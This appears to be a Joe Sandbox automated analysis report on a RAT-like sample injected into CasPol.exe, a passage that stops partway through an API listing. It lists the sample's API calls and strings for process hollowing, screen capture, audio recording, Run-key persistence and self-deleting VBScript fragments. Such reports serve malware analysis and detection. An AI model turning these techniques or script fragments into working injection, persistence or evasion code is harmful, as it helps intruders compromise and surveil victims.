                                                                                                            • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                            • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                            • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                            • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                            • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                            • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                            • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                            APIs
                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                                                                              • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                                                                            • DeleteDC.GDI32(?), ref: 0041806D
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418070
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                            • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                            • DeleteObject.GDI32(?), ref: 00418117
                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                            • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                            • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                            • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 1765752176-865373369
                                                                                                            • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                                                                                                            • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                            • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                                                                                                            • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                            • API String ID: 4188446516-108836778
                                                                                                            • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                            • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                            • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                                                            • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                              • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                              • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                              • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                            • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                                                                                                            • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                            • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                                                                                                            • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                            • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                                                                                                            • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                                                                                                            • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                                                                                                            • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                            • Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                                                                                                            • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                            • Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
                                                                                                            • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                            • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                            • API String ID: 738084811-1408154895
                                                                                                            • Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                                                                                                            • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                            • Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
                                                                                                            • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Write$Create
                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                            • API String ID: 1646373207-165202446
                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
